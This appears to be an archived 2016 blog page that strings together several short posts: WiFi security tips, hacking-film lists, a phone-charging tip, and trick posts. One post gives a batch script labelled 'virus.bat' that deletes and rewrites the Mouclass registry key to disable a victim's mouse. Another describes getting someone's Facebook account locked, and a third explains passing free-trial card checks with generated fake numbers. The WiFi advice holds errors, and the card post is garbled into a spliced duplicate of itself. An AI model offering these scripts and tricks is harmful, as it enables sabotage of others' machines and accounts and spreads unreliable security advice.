Friday, 22 April 2016

WiFi security tips


Wifi stands for Wireless Fidelity.
Most people rush through while setting up their wifi connection without thinking about the security of wifi connection.It is quite understandable that they want to connect to Internet as quickly as possible and Moreover securing a wifi network is a bit tricky for most of the people so they give up their hopes quite early and leave their wifi network unsecured.Their are several loopholes through which your unsecured wireless connection can be easily hacked.So ,In this post you will know how to secure your wifi network with simple steps.



If your wireless network has been hacked or accessed by somebody else then it may lead to complete usage of your data if you have a limited data plan or worse it may lead to extra charges on you.Even if you have unlimited data plan then also you will get less speed if your wifi has been hacked.
 The step by step  guide given below summarize all the necessary steps you should take for securing your wifi network.

  • Change Default Administrator Passwords (and Usernames)
 Whenever you purchase a new moden or new connection then you are required to configure your modem.The modem configuration page can be accessed by entering a username and password for protecting it from unauthorized access.By default the usernames that most of the modem companies use are admin or administrator and the default password that is used is password,public,admin or some other simple word.So change your usename and password as soon as you setup your modem because these username and password combinations are known by most of the hacker .
  • Turn on (Compatible) WPA / WEP Encryption
 Most of the modern modems allows both wpa and wep for securing your wifi.Applying these keys will not only encrypt your wifi network connection but it will also apply authentication .So,you should select the strongest encryption to secure your wifi network.
  • Enable MAC Address Filtering
 Mac addresses are also known as  physical address of a computer.Mac address is unique address of a computer and it is static and cannot be changed.So,your router can be configured to connect to only to those devices whose MAC address match to the home devices.It will secure your wifi connection by just allowing the home devices to connect to it.
  • Enable Firewalls On Each Computer and the Router
 Most of the modern routers come with a inbuilt firewall capability to secure your wifi network.Make sure that your router firewall is turned on if your router has one.On the other hand you can also use firewall in your computers.They provide an extra and a strong layer of protection to secure your wifi connection from hackers or network attackers.
  • Position the Router or Access Point Safely
A small leakage of wifi signal from home to the outside cannot be stopped but the leakage of the signal can be minised to a greater extent by just changing the direction of your antenna of the router.Never place your router near windows instead try to place it in the center of the house.You will get best quality of wifi signal through out home with less leakage of wifi signal to the outer world.
  • Turn Off the Network During Extended Periods of Non-Use
 Turn of the router when it is not used.It will secure your wifi connection by giving out less access  time to hackers to your wifi network and it will be difficult for them to hack in short period of time.Moreover it will be saving your electricity which will be a secondary advantage for you.

Make a virus to disable mouse

Make a virus to disable mouse
  
  • Open Notepad and copy below codes

rem ---------------------------------
 rem Disable Mouse
 set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
 reg delete %key%
 reg add %key% /v Start /t REG_DWORD /d 4

 rem ---------------------------------
  • Save this file as virus.bat
  • Done you just created your virus.

Saturday, 16 April 2016

How To Disable , Destroy , Crash Someone Facebook Id

How To Disable , Destroy , Crash Someone Facebook Id

How To Disable , Destroy , Crash Someone Facebook Id

ThIS is VerY simple And 101% Working Trick

http://34255353309

Just Ask Your Vicitm or Friend To Copy This Link And Comment It to his profile picture


If victim do this his id was temporary locked And Asking Photo Verification

It's 100% Working Method.

Charge Your Smartphone 25% faster

Enable Airplane Mode While You Charge

The secret to charging your smartphone up to 25% faster is simple—just enable Airplane Mode while you charge. This works because it turns off battery-draining connectivity radios and lets your phone focus on charging and charging alone.

https://www.facebook.com/notifications.php?refid=17

Cs documentries

Top documentaries on computer.


The Signal http://www.imdb.com/title/tt2910814/ 2014
BlackHat http://www.imdb.com/title/tt2717822/ 2015
The Score http://www.imdb.com/title/tt0227445/ 2001
Anti-Trust http://www.imdb.com/title/tt0218817/ 2001
The Matrix http://www.imdb.com/title/tt0133093/ 1999
The Lawnmower Man http://www.imdb.com/title/tt0104692/ 1992
Fool Proof http://www.imdb.com/title/tt0356614/ 2003
Sneakers http://www.imdb.com/title/tt0105435/ 1992
GoldenEye http://www.imdb.com/title/tt0113189/ 1995
Untraceable http://www.imdb.com/title/tt0880578/ 2008
Disclosure http://www.imdb.com/title/tt0109635/ 1994
Mission: Impossible - Ghost Protocolhttp://www.imdb.com/title/tt12292382011

Top 10 movies based on hacking.



In recent years, Hollywood has taken a shine to hackers, with hackers appearing in almost every heist or mystery movie now. This can be both good and bad for our profession. As we know, whichever way Hollywood decides to depict our profession is how most people will perceive it.
The good news is that not all of Hollywood's depictions of hackers are negative, despite the overwhelming perception by the masses that our profession is a malicious one.
In trying to determine the ten best hacker movies, I tried to only use those films where people are actually entering into other peoples' or organizations' computers for good or ill. Very often, reviewers of this genre include any movie with computer "stuff" as a "hacker movie." In my definition of a hacker movie, someone must be using advanced skills to access someone else's computer, without their consent or knowledge, for good or ill.
In addition, I evaluated the movies based upon plot, acting, directing and, most importantly, how they portrayed hackers. They got extra points if they portrayed the hackers as the "good guys," have female hackers in opposition to the male geek archetype, and even more points if the hacking represents something close to reality.

#10. Takedown

Takedown (also known as Trackdown) is a B-grade movie—a fictionalized and sensationalized account of the tracking and capture of probably the most infamous U.S. hacker, Kevin Mitnick. Based upon the book and written by his nemesis, Tsutomu Shimomura, the story tends to glorify Shimomura. Mitnick operated in the 1980s and '90s and eventually went to prison for a couple of years. Now, he is a highly paid IT security consultant, speaker, and writer.
This movie has low production values, despite having some relatively well-known actors (Skeet Ulrich, Tom Berenger, and Amanda Peet, among others). Don't expect to learn much hacking from this movie, though, as nearly the entire 1 hour and 36 minutes is a story about tracking down Kevin Mitnick as the FBI and Shimomura searches for him across the states.

#9. Swordfish

In Swordfish, Hugh Jackman plays a retired, elite hacker who has been released from a long prison term and is now working in the oil fields and living in a trailer. He is approached by an organized crime figure played by John Travolta, and is forced to do one last hacking job against his will.
Unfortunately, the hacking is forgettable and far from reality. Jackman's character is seen breaking into highly secure systems within seconds, while gyrating geometric objects appear on his screen. Very little depiction of the actual hard work that goes into hacking is seen, and they make it look like a computer game.
The most memorable part of this movie is Halle Berry's topless scene. Although it has nothing to do with hacking, it does make this movie memorable.

#8. The Italian Job

Although the MINI Coopers are really the stars of The Italian Job (a remake of the 1969 film of the same name), Seth Green plays Lyle, a hacker among a group of elite thieves, who is able to manipulate traffic signals, among other devices, that make this grand theft possible. Could this hacker have been using Shodan to identify and assist in hacking these devices?
Although not true to the detail, it does portray hacking with some realism. I really like the concept that ALL digital devices are susceptible to hacking, not just computer systems.

#7. The Fifth Estate

The Fifth Estate is an unauthorized account of Julian Assange and WikiLeaks. Cumberbatch plays a believable Assange as a egotistical, idealist that is out to change the world. Few Americans know that Assange is a famous (or infamous) hacker in his native country of Australia. He broke into the Pentagon, Citibank, NASA, and Stanford University, among other facilities, before being caught.
WikiLeaks was founded to provide a safe place for whistleblowers to make secret state information available to the world when that information reveals the ill deeds of powerful governments. They were responsible for the leaks regarding U.S. military abuses in Iraq and Afghanistan, as well as in other places.
Although little hacking takes place in this movie, it is an important film for the hacking community as it depicts how hacking can potentially change the world history, as I'm sure it will.

#6. Ghost in the Shell

Ghost in the Shell is a classic Japanese anime film that depicts a future (probably mid-21st century) where humans are part flesh and blood and part bionic. Many people have cyber brains that are part electronic and part grey matter. This cyber brain enhances their cognitive abilities and allows them to plug into larger networks. This is an intriguing concept that is likely to become reality in the very near future.
The story is about a special operations task force that is part-police and part-military. The lead character is female officer whose body was destroyed as young girl and has been replaced by a beautiful bionic body. The hacking in this futuristic tale is the even more malicious variety of hacking, the hacking of the human mind.


#5. Sneakers

In Sneakers, Robert Redford and Ben Kingsley portray two young hackers whose lives take two different directions after their playful hacking leads to the arrest of Kingsley's character. They meet again some thirty years later when one (Kingsley) is working for the bad guys and the other (Redford) isn't sure who he's working for when he's forced to comply upon threat of his true identity being revealed.
The plot revolves around a new encryption algorithm that would make electronic communication secure. The NSA plays the bad guys who want the encryption algorithm so that they can spy on everyone. The movie was ahead of its time in that respect.

#4. Live Free or Die Hard

The fourth installment in the Die Hard series, Live Free or Die Hard, depicts a scenario where a hacker played by Timothy Olyphant (of Justified fame) takes down nearly the entire U.S. infrastructure in an attempt to transfer trillions of dollars from the Federal Reserve to his account.
As I believe this type of infrastructure hack is one of the most important issues in national security, it gets kudos from me. Watching Bruce Willis ride outside of a Harrier Jump Jet to take down the bad guys is simply laughable, though. Another notable moment in this movie is the portrayal by Justin Long as the good guy hacker employed by Willis' cop character to assist in stopping the bad guys. You probably remember him from the iconic "Mac vs. PC" ads.

#3. WarGames

This classic 1983 hacker move WarGames depicts a young teenage bedroom hacker played by Matthew Broderick who almost starts World War III. By war-dialing, he is able to get unencumbered access to the Department of Defense's nuclear missile launch controls.
The hacker is portrayed as a playful, rather than malicious, and knowledgeable teenager who inadvertently hacks into critical DoD systems.

#2. The Girl with the Dragon Tattoo

Noomi Rapace portrays The Girl with with Dragon Tattoo (I prefer the original Swedish version to the Hollywood version) superbly. She is a young woman, recently released from prison for a crime of passion in her youth. She has been traumatized by the corrections and probation system and is probably showing signs of mild autism. As a way of earning an income, she works as hacker for hire for a private investigator. This leads her into the path of Mikael, a middle-aged investigative writer who is being unfairly persecuted by a diabolical wealthy industrialist.
Her hacking is critical to revealing the identity of the true evil-doer. Although the hacking is oversimplified, it is far more realistic than most films, even if she is using a Mac. She works from a command line terminal and there are scenes showing the Unix/Linux file structure.

#1. Hackers

In Hackers, Angelina Jolie and Johnny Lee Miller (they were married after the making of this movie) portray two youthful and hip hackers. Miller (now of the Sherlock Holmes TV spinoff, Elementary) portrays a hacker who got caught as a very young child (11) after crashing thousands of computers and has been sentenced to zero computer access until his 18th birthday.
The hacking is relatively realistic, although a bit dated. The film was made in 1993, but the technology looks to be mid- to late-1980s. It gets points for portraying hackers as the good guys (thwarting the plans of the evil corporation) and as hip, rather than nerds.
What do think? Did I miss any great hacking flicks?

How to get free trials of credit cards.





When I see the words "free trial," I know I'm probably going to have to whip out my credit card and enter in the number to "not get charged." Then I end up forgetting about the trial and want to kick myself in the ass when I see my statement at the end of the month.
In order to avoid that rigmarole, you can actually use fake credit numbers instead of your own, and you can do that using the sitegetcreditcardnumbers.com, which can generate up to 9,999 credit card numbers at a time, or just one.
Now, to be completely clear, these numbers cannot be used to purchase any item. Nada. Zilch. Nothing. For that to work, you would need a valid expiration date and CVV or CSV number. This site merely provides the standard 16 digit credit card number that can be used to bypass certain online forms that only ask for the number.

How Does It Work?

The credit card number generator uses a system based off of the Luhn Algorithm, which has been used to validate numbers for decades.A fake number will work for sites that store credit card information to either charge you later or ask you to upgrade.
For sites that ask for an upfront fee or have an automatic charge sometime down the line (Hulu Plus, Netflix, Spotify), this won't work since they ask for more than just a credit card number for validation. You can, however, getunlimited free trials on those sites using a simple trick with your email address if you have a valid card number with expiration date and CSV.

Getting a Card Number on Android

There's also an AndroidWhen I see the words "free trial," I know I'm probably going to have to whip out my credit card and enter in the number to "not get charged." Then I end up forgetting about the trial and want to kick myself in the ass when I see my statement at the end of the month.
In order to avoid that rigmarole, you can actually use fake credit numbers instead of your own, and you can do that using the sitegetcreditcardnumbers.com, which can generate up to 9,999 credit card numbers at a time, or just one.
Now, to be completely clear, these numbers cannot be used to purchase any item. Nada. Zilch. Nothing. For that to work, you would need a valid expiration date and CVV or CSV number. This site merely provides the standard 16 digit credit card number that can be used to bypass certain online forms that only ask for the number.

How Does It Work?

The credit card number generator uses a system based off of the Luhn Algorithm, which has been used to validate numbers for decades.A fake number will work for sites that store credit card information to either charge you later or ask you to upgrade
For sites that ask for an upfront fee or have an automatic charge sometime down the line (Hulu Plus, Netflix, Spotify), this won't work since they ask for more than just a credit card number for validation. You can, however, getunlimited free trials on those sites using a simple trick with your email address if you have a valid card number with expiration date and CSV.

Getting a Card Number on Android

There's also an Android application for getting fake card numbers calledCardGen, available for free in the Play Store. You can generate and validate credit card numbers directly from the app, making it easy to use on the go as well. Validation in particular would be useful if you were accepting credit card payments on your own site and wanted to make sure the cards were legit.
Don't forget to like on Facebook zeroint


The app is ad-supported, but since it's free, I can live with that. In the generate field you can select from most of the major credit card providers, including American Express, Mastercard, Visa, and Discover. The disclaimer explains what the app does and how you should use it.
 application for getting fake card numbers calledCardGen, available for free in the Play Store. You can generate and validate credit card numbers directly from the app, making it easy to use on the go as well. Validation in particular would be useful if you were accepting credit card payments on your own site and wanted to make sure the cards were legit.


The app is ad-supported, but since it's free, I can live with that. In the generate field you can select from most of the major credit card providers, including American Express, Mastercard, Visa, and Discover. The disclaimer explains what the app does and how you should use it.